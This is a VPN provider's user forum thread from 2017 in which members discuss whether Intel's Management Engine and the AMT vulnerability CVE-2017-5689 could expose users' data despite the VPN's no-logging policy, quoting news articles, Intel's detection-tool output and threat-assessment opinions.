"Private Internet Access does not log" - what about Intel AMT/Active Management Technology?

Regarding:
https://www.privateinternetaccess.com/forum/discussion/25521/private-internet-access-does-not-log


But what if there's a sub-o/s leak of all your PC's content via Intel Active Management Technology / Intel Management Engine or its equivalents like AMD's Platform Security Processor /PSP? Since ca. 2006 at least...

Some informed comment from PIA in particular on the following would be welcome, to me it's mostly incomprehensible, as incomprehensible as the output of the Intel diagnostic tool issued in relation to the critical security issue referenced below.

https://www.theregister.co.uk/2017/10/21/purism_cleanses_laptops_of_intel_management_engine/

https://en.wikipedia.org/wiki/Intel_Active_Management_Technology

"On May 15th, 2017, Intel announced a critical vulnerability in AMT. According to the update "The vulnerability could enable a network attacker to remotely gain access to business PCs or devices that use these technologies".[43] Intel announced partial availability of a firmware update to patch the vulnerability for some of the affected devices."

http://www.intel.com/content/www/us/en/architecture-and-technology/intel-amt-vulnerability-announcement.html?cid=sem43700020664978070&intel_term=intel+amt&gclid=CjwKEAjw6e_IBRDvorfv2Ku79jMSJAAuiv9YxWLVPO0LpmcztbPctTbUFHqfpKONqvJQnI4XEwwJiRoC8d7w_wcB&gclsrc=aw.ds


https://forums.theregister.co.uk/forum/3/2017/10/21/purism_cleanses_laptops_of_intel_management_engine/

Disregarding the not inconsiderable volume of garbage posts, the following raise concerns:

"This stuff can access the network card directly. It doesn't care about local firewalls."

"....."The design choice of putting a secretive, unmodifiable management chip in every computer was terrible, and leaving their customers exposed to these risks without an opt-out is an act of extreme irresponsibility," (EFF)...

http://www.cl.cam.ac.uk/~rja14/tcpa-faq.html "

"If a machine can't boot its OS, you need something running under the operating system, at the chipset firmware level, to recover the box.

Er, isn't this what PXE booting is for?"

"This "management" is sitting within main processor spying everything it does and acts as a middle man to _everything_ main processor is doing. Perfect backdoor you can't even disable.

Renders any encryption you have totally worthless: NSA _must see_ everything you do and Intel is their hand sock in this case, lying whatever they can."

"Macs have their own System Management Controller (SMC) too..."


"AMT is not supposed to be enabled in "consumer" CPUs; if these are the ones used in any given PC, doesn't the problem take care of itself?"

I haven't searched PIA forums for this yet, I'm just recuperating from the fact that this is apparently reality, and that it's not 'shocking' but plausibly predictable.

Comments

  • Posts: 224
    Tripod said:
    Regarding:
    https://www.privateinternetaccess.com/forum/discussion/25521/private-internet-access-does-not-log


    But what if there's a sub-o/s leak of all your PC's content via Intel Active Management Technology / Intel Management Engine or its equivalents like AMD's Platform Security Processor /PSP? Since ca. 2006 at least...

    Some informed comment from PIA in particular on the following would be welcome, to me it's mostly incomprehensible, as incomprehensible as the output of the Intel diagnostic tool issued in relation to the critical security issue referenced below.

    https://www.theregister.co.uk/2017/10/21/purism_cleanses_laptops_of_intel_management_engine/

    https://en.wikipedia.org/wiki/Intel_Active_Management_Technology

    "On May 15th, 2017, Intel announced a critical vulnerability in AMT. According to the update "The vulnerability could enable a network attacker to remotely gain access to business PCs or devices that use these technologies".[43] Intel announced partial availability of a firmware update to patch the vulnerability for some of the affected devices."

    http://www.intel.com/content/www/us/en/architecture-and-technology/intel-amt-vulnerability-announcement.html?cid=sem43700020664978070&intel_term=intel+amt&gclid=CjwKEAjw6e_IBRDvorfv2Ku79jMSJAAuiv9YxWLVPO0LpmcztbPctTbUFHqfpKONqvJQnI4XEwwJiRoC8d7w_wcB&gclsrc=aw.ds


    https://forums.theregister.co.uk/forum/3/2017/10/21/purism_cleanses_laptops_of_intel_management_engine/

    Disregarding the not inconsiderable volume of garbage posts, the following raise concerns:

    "This stuff can access the network card directly. It doesn't care about local firewalls."

    "....."The design choice of putting a secretive, unmodifiable management chip in every computer was terrible, and leaving their customers exposed to these risks without an opt-out is an act of extreme irresponsibility," (EFF)...

    http://www.cl.cam.ac.uk/~rja14/tcpa-faq.html "

    "If a machine can't boot its OS, you need something running under the operating system, at the chipset firmware level, to recover the box.

    Er, isn't this what PXE booting is for?"

    "This "management" is sitting within main processor spying everything it does and acts as a middle man to _everything_ main processor is doing. Perfect backdoor you can't even disable.

    Renders any encryption you have totally worthless: NSA _must see_ everything you do and Intel is their hand sock in this case, lying whatever they can."

    "Macs have their own System Management Controller (SMC) too..."


    "AMT is not supposed to be enabled in "consumer" CPUs; if these are the ones used in any given PC, doesn't the problem take care of itself?"

    I haven't searched PIA forums for this yet, I'm just recuperating from the fact that this is apparently reality, and that it's not 'shocking' but plausibly predictable. 

    https://www.privateinternetaccess.com/forum/discussion/23900/private-internet-access-is-not-affected-by-the-intel-amt-vulnerability

  • Posts: 266
    @OpenVPN I was about to unsticky that post along with a bunch of other old news. I guess they'll stay there a bit longer eh!
  • Posts: 43
    Thanks for link @OpenVPN.

    That's server side - good! - unless you link from the main article I quoted
    https://www.theregister.co.uk/2017/10/21/purism_cleanses_laptops_of_intel_management_engine/
    to
    https://www.theregister.co.uk/2017/08/29/intel_management_engine_can_be_disabled/

    and also read this:

    "The revelation prompted calls for a way to disable the poorly understood hardware. At the time, the Electronic Frontier Foundation called it a security hazard. The tech advocacy group
    demanded a way to disable "the undocumented master controller inside our Intel chips" and details about how the technology works.

    An unofficial workaround called ME Cleaner can partially hobble the technology, but cannot fully eliminate it. "Intel ME is an irremovable environment with an obscure signed proprietary firmware, with full network and memory access, which poses a serious security threat," the project explains.

    On Monday, Positive Technologies researchers Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy said they had found a way to turn off the Intel ME by setting the undocumented HAP bit to 1 in a configuration file."


    So presumably OpenVPN's link above means PIA has done just this, resetting the undocumented HAP bit....?

    As for client side (me) I guess I will have to waste more time reading Intel's website and / or asking its support to translate the meaning of the following result of running 'INTEL-SA-00075 Detection and Mitigation Tool'

    https://downloadcenter.intel.com/download/26755/INTEL-SA-00075-Detection-and-Mitigation-Tool?v=t

    on a Sony Vaio, thus:

    **********************************************
    Risk Assessment
    Based on the analysis performed by this tool, this system is not vulnerable; the ME SKU is not affected.

    Explanation:
    If Vulnerable, contact your OEM for support and remediation of this system.
    For more information, refer to CVE-2017-5689 in the following link: CVE-2017-5689
    [https://nvd.nist.gov/vuln/detail/CVE-2017-5689]
    or the Intel security advisory Intel-SA-00075 in the following link: INTEL-SA-00075
    [https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr]

    INTEL-SA-00075 Detection Tool

    Application Version: 1.0.3.215
    Scan date: 2017-10-24 01:26:43

    Host Computer Information
    Name: Sony...........
    Manufacturer: Sony Corporation
    Model: VP.......
    Processor Name: Intel(R) Core(TM) i5 CPU M 520 @ 2.40GHz
    Windows Version: Microsoft Windows 7 Professional

    ME Information

    Version: 6.0.3.1195
    SKU: Consumer
    Provisioning Mode: Not Provisioned
    Control Mode: None
    Is CCM Disabled: True
    Driver installation found: True
    EHBC Enabled: False
    LMS service state: Running   <------------------------------------------------------------N.B.
    microLMS service state: NotPresent
    Is SPS: False

    *************************************************************************

    For instance there's an interesting Intel Support exchange here:
    https://communities.intel.com/thread/114519

    [Customer] "And how to prevent AMT provisioning?, does AMT provisioning state switch from 0 to 2 automatically or under any specific circumstance?"

    [Intel] "AMT provisioning does not switch state automatically."

    [Customer] "If a machine having LMS service but AMT is unprovisioned, is it vulnerable?"
    {Tripod: see my Intel diagnosis report above}

    [Intel] "The vulnerability on the system will not be fixed until the firmware has been updated."


    {Tripod: so where the diagnosis report above shows LMS service running but the rest (semble) is inactive that means no firmware update is needed..? (and how exactly would that be accomplished on a no-longer-supported Sony Vaio?)}


    In that same thread Intel Support states:
    "Without vPro, there is no AMT and hence, you are not exposed to this vulnerability..."

    My questions in the ignorance of the non-tech user are:

    1) is there another Intel "management" (sic) routine by another name aside from AMT under "vPro"?

    2) Intel has confirmed it is not providing a "backdoor" in its chips so on what is based all that content to the opposite in theregister articles and links? They don't all look just like click-bait.

    I appreciate these are primarily Intel Support questions, I'm just looking for some third party (informed) community indication of consensus of whether there is a material issue or not even after running 'INTEL-SA-00075 Detection and Mitigation Tool' with the result above.


  • Posts: 266
    I don't really have the answer to those specific questions but my understanding from our official announcement is that we just don't use the built-in ports anyway. There's a ton of traffic that flows in and out of the servers so it would make sense that most of our servers uses a couple of PCIe network cards which wouldn't be any use to exploit the AMT unless Intel baked drivers for a whole ton of third-party network cards in their CPUs. That wouldn't be impossible strictly speaking, but considering the purpose of the network stack in the firmware is for remote management of servers I doubt they'd have done that unless they were specifically aiming at a reliable backdoor.
  • Posts: 43
    The story runs and runs...

    http://www.tomshardware.com/news/google-removing-minix-management-engine-intel,35876.html

    At least it provides relief from
    http://cryptome.org/2013/12/Full-Disclosure.pdf
    "Full Disclosure: The Internet Dark Age"
    (BT router has vlan back door)
    - relief that is, as in: a bit like the pain of falling off a ladder after you've hit your thumb with a hammer...
  • edited November 13 Posts: 85
    @max-P @Tripod ; Also a good read:

    https://www.eff.org/deeplinks/2017/05/intels-management-engine-security-hazard-and-users-need-way-disable-it

    Frankly, whatever vulnerabilities your system has inherently are out of reach of PIA or any software solution really. It is a big problem, but it's not one PIA or even you can solve. It will only be solved when consumers stand up and demand open source hardware.

    The newer chip and computer you buy, the more chance it is probably harboring something like this (or worse) inside it and it is a legitimate concern and reason why many hackers still prefer older model laptops and desktops.

    Personally, I choose to operate with the assumption of total compromise but also a reasonable threat assesment:

    1. Exploiting this vulnerability in the wild would send shockwaves across the entire hardware world and whatever oppressive government shadow groups who might have weaponized it will use it sparingly as they would a nuke, as they will only get one shot at it;
    2. There is a huge difference between intelligence gathering/dragnets and targeted attacks. The amount of resources needed for a targeted attack that something like that would require is like out of a movie where the whole world can only be saved by some hacker.

    Is it a legitimate threat?


    Not for most people I'd say. As time goes by though, the statistical chances of it being used as part of an exploit do grow bigger though.

    Is it worth making noise about?


    Of course. Anything that potentially sets our society, security or personal safety back is worth making noise about. Personally, I make noise about mobile phones having blobbed firmware and modems, and how noone can truly trust a phone's software and operating system so long as the phone itself can always read whatever is in RAM and send it off to the carrier. Unacceptable!

    What can I do?


    Personally? Keep an eye out for fixes, patches, watch the discussion, look for future chipsets that don't have binary blobs, look for solutions tha can be considered "open hardware", practice good firewall policies so that exploits can't get in or out, don't become an enemy of the state, etc.

    What can we all do?


    Stop supporting closed source solutions, security through obscurity, organizations that pretend it's not an issue, and chips that run their own binary blob operating systems inside. Boycott the industry if necessary. Crowdfund alternatives. Be a part of the change! It's a long road though and the battle is against a well entrenched, government and military supported oligopoly. It will not be easy nor speedy to resolve this. It will take a revolution of sorts that will first most likely require a nationstate or major corporation be crippled by this vulnerable model.

    Important to note though that Google is already fighting against it for their security model for example. Doesn't mean an open source or more transparent solution will be available to the public though, they might just get a special deal in private.
    Post edited by sn0wmonster on
Sign In or Register to comment.